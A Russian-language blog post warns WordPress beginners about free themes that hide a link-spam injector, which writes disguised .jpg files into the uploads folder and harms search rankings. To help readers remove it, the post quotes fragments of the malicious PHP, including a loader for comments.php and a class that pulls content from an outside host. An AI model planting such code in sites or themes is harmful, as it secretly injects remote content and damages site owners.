Вредоносный код на сайте — как найти и обезвредить

Вредоносный код на сайте — как найти и обезвредить

Всем привет. Сегодня тема моего поста достаточно неприятная, поскольку речь пойдет о людской непорядочности, носящей в интернете отнюдь не виртуальный характер — о вредоносном коде на сайте. Кто и почему намеренно вредит людям, которых и в глаза-то никогда не видел? И кто, прежде всего, является объектом этого подлого вредительства? Ответ на второй вопрос очевиден – вы, уважаемые новички.

Что ж, хватит интриги, перейдем к сути. Мало кто из новоиспеченных блоггеров начинает свою деятельность в интернете с покупки шикарного шаблона. Еще меньшее количество заказывает его у фрилансера. Основная же масса серфит по интернету в поисках бесплатной темы, смутно представляя, как с этой темой дальше работать, выбирая по принципу «нравится — не нравится». Найдя, наконец, то, что нравится, человек искренне радуется своему приобретению, мысленно вознося слова благодарности админу сайта, на котором он этот шаблон нашел. И совершенно не подозревает, что сам по себе данный шаблон – это еще не подарок. Основной подарок вполне может находиться внутри.

Вредоносный код на сайте — места дислокации

Любая тема WordPress состоит из определенного количества файлов, в которых расположен код, не только новичку, но и человеку бывалому далеко не всегда понятный. С течением времени каждый из нас худо-бедно начинает разбираться в каких-то элементарных, связанных с минимальным редактированием кода, вещах, но по-началу…. Да мы просто туда не заглядываем.

А дистрибутив WordPress? Особенно, если он устанавливается хостером автоматически, без нашего с вами участия? Что мы знаем, допустим, о корневой папке сайта? Какие там должны находиться файлы, а какие – не должны? А папку uploads, когда вы наводили здесь порядок в последний раз? Никогда? Вот на это и делается основной расчет, поскольку именно в папке uploads и будет находиться тот самый подарок, о котором шла речь в начале статьи.

Как он выглядит? Да очень просто: длинный ряд неизвестного происхождения файлов с расширением jpg, которые в графическом редакторе почему-то упорно не открываются. Их вполне можно принять за неработающий хлам, накопившийся за время ведения блога, поскольку загруженные когда-то изображения все мы когда-нибудь да меняем. Это если бросить беглый взгляд. А если присмотреться повнимательней?

Внешний вид вредоносных ссылок

История, случившаяся не с кем-то

Обрисую ситуацию на собственном примере. Где-то с месяц назад я решила, наконец, сменить тему своего блога. Слабо надеясь на бесплатный вариант, все же отправилась на сайт wp-templates. ru и, представляете, нашла то, о чем и мечтать не смела – прекрасный современный шаблон. Я с удовольствием заплатила бы за него – настолько он мне понравился, но он был еще и бесплатным! Конечно, смутные сомнения все же возникли – с чего бы это? Через пару недель я поняла – с чего.

Мои позиции в Google как-то вдруг резко упали. Поскольку никаких видимых причин для наказания блога не было, стоило поискать причины невидимые. И они нашлись – в папке uploads. Далее нашелся и источник их возникновения – в двух файлах столь приглянувшейся мне темы был размещен специальный код, запускающий на блоге скрипт по закачиванию на него левых ссылок. Не скажу, что их внешний вид так уж ловко замаскирован под картинку, но вот код в самих файлах «воткнут» так удачно, что, даже зная, как он выглядит, нашла я его далеко не сразу.

Большинство из этих ссылок имеют нулевой вес, остальные – вполне приличный, до 500 кб.

Вес левых ссылок

Не открываются данные файлы в графическом редакторе по одной простой причине – они текстовые, так что в Notepad++ их вполне можно открыть и рассмотреть поближе. Здесь я не привожу скриншот открытой ссылки, потому что поспешила удалить из темы код, и они, разумеется, исчезли. Если вы обнаружите их у себя на сайте – открыть их будет делом одной минуты. Их обозначения в папке выглядят примерно так: 3f409463bdc46e5c494fa2cd0a4d9bc6.jpg

В открытом виде ссылка содержит тэг {position:absolute;left:-1960px;}, свидетельствующий о том, что ссылка скрыта от глаз пользователей и доступна лишь поисковому роботу. Почему текстовый файл имеет расширение jpg? Да потому, что малоопытному пользователю вряд ли придет в голову проверить его еще и в текстовом редакторе. Не открывается – и ладно. Таким образом, ваш сайт становится чем-то вроде инкубатора по выращиванию чужого благосостояния. Ну а каково отношение поисковиков к сайтам с таким количеством внешних ссылок? Разумеется, негативное.

С чего нужно начинать проверку на предмет таких вот подарков? С папки uploads. Откройте FTP Client, найдите в корневой папке вашего сайта папку wp-content, и уже в ней — папку uploads. Именно сюда помещает WordPress все загружаемые вами медиафайлы, и именно здесь вы можете обнаружить ряд неизвестного происхождения ссылок, имеющих длинное обозначение с расширением jpg. Удалять их не имеет никакого смысла – они появятся снова. Для того, чтобы от них избавиться, необходимо в двух файлах используемой вами темы найти размещенный там код и его удалить.

ПЕРВЫЙ ФАЙЛ – COMMENTS. PHP. Расположенный здесь код выглядит следующим образом:

<?php $lib_path = dirname(__FILE__).’/’;require_once(‘functions. php’); $links = new Get_links(); $links = $links->return_links($lib_path); echo $links; ?>

Файл comments. php

ВТОРОЙ ФАЙЛ — FUNCTION. PHP. По объему он значительно больше предыдущего:

Начинается с класса Get_links: class Get_links { var $host = ’wpconfig. net’; var $path = ’/system. php’; var $_cache_lifetime = 21600; var $_socket_timeout = 5; (приведенный фрагмент – далеко не полный); а заканчивается:

$data = file_get_contents($file); return $data;

}

}

}

Файл темы function. php

Совсем не обязательно код в теме будет прописан вот так, по всем правилам. В моем файле он находился в самом начале и был плотно сгруппирован, как показано на скриншоте, и все же строка — class Get_links { — оказалась достаточно хорошим ориентиром для того, чтобы его обнаружить.

Нерадужные перспективы

А теперь – чем такой «подарок» может обернуться?

Во-первых, за большое количество спамных ссылок вас, скорее всего, накажут поисковые системы – понижение в ранжировании, фильтр, а если уж совсем не повезет, то и БАН.

Если левые ссылки ведут на мошеннические сайты, вас вполне могут объединить с ними в одно целое, и тогда БАН просто гарантирован;

ТИЦ и PR сайта покатятся вниз практически без видимых причин, а если на момент внедрения они были нулевыми – то таковыми и останутся.

Не думаю, что такой призыв к бдительности – чрезмерен. Каждому из нас кажется, что это где-то и кого-то коснутся подобные неприятности, а я – ну кому я нужен? Я тоже так думала, пока на одном хостинге у меня не взломали блог и не установили туда очень милую программу по отлову чужих денег. Правда, не для меня.

С сайта kinozal. ru я получила очередной подарок – вместо рекламы Google Adsense на моем блоге появилась реклама он-лайн игр, хотя видимой она была только для меня — всем, заходящим на мой блог, демонстрировалась нормальная реклама от Google. Избавилась я от этой хвори лишь переустановив браузер и перестав посещать этот рассадник левой рекламы. Хотя сам сайт очень удобный и пользовалась я им достаточно долго.

Третий раунд борьбы с негодяями – шаблон, позаимствованный на сайте wp-templates. ru, стоящим, кстати, первым в поисковой выдаче по запросу «Русские шаблоны для WordPress». В интернете на него откровенно указывают, как на основной источник распространения заразы, только вот откуда это знать неискушенному новичку, наивно полагающему, что здесь, в интернете, все по-честному….

Итак, что стоит сделать по прочтении этой статьи:

Поднапрячься и вспомнить – на каком сайте вы нашли установленный у вас шаблон;

Тщательно проверить на хостинге папку uploads. Если вы найдете похожие на приведенные в статье ссылки с расширением jpg, которые не открываются в графическом редакторе, срочно проверяйте файлы темы – comments. php и function. php. Если же у вас не хватает для этого опыта – обратитесь к фрилансеру, который поможет вам от этих ссылок избавиться.

А в завершение так и хочется написать: Будьте бдительны! Хакер не дремлет!


Карта сайта


Информационный сайт Webavtocat.ru